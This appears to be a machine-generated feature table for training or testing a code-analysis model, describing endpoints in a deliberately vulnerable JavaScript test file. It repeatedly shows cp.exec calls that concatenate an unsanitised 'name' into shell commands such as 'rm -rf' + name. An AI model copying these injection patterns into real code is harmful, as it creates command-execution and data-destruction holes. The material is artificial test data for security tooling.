Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:23 | "for foo in (" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:23 | "for foo in (" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:23 | "for foo in (" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:23 | "for foo in (" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:23 | "for foo in (" | stringConcatenatedWith | -endpoint- name + ') do bla end' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:30 | "for fo ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:30 | "for fo ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:30 | "for fo ... + name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:30 | "for fo ... + name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:30 | "for fo ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:47 | "for fo ... la end" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:27:69:30 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:27:69:30 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:27:69:30 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:27:69:30 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:27:69:30 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:27:69:30 | name | stringConcatenatedWith | 'for foo in (' -endpoint- ') do bla end' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:34:69:47 | ") do bla end" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:34:69:47 | ") do bla end" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:34:69:47 | ") do bla end" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:34:69:47 | ") do bla end" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:34:69:47 | ") do bla end" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:34:69:47 | ") do bla end" | stringConcatenatedWith | 'for foo in (' + name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | exceptional return of cp.exec ... + name) | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:5:71:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:5:71:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:5:71:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:5:71:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:5:71:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:24 | "cat /foO/BAR/" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:24 | "cat /foO/BAR/" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:24 | "cat /foO/BAR/" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:24 | "cat /foO/BAR/" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:24 | "cat /foO/BAR/" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:24 | "cat /foO/BAR/" | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:10:71:31 | "cat /f ... + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:28:71:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:28:71:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:28:71:31 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:28:71:31 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:28:71:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:28:71:31 | name | stringConcatenatedWith | 'cat /foO/BAR/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:3 | cp | contextFunctionInterfaces | 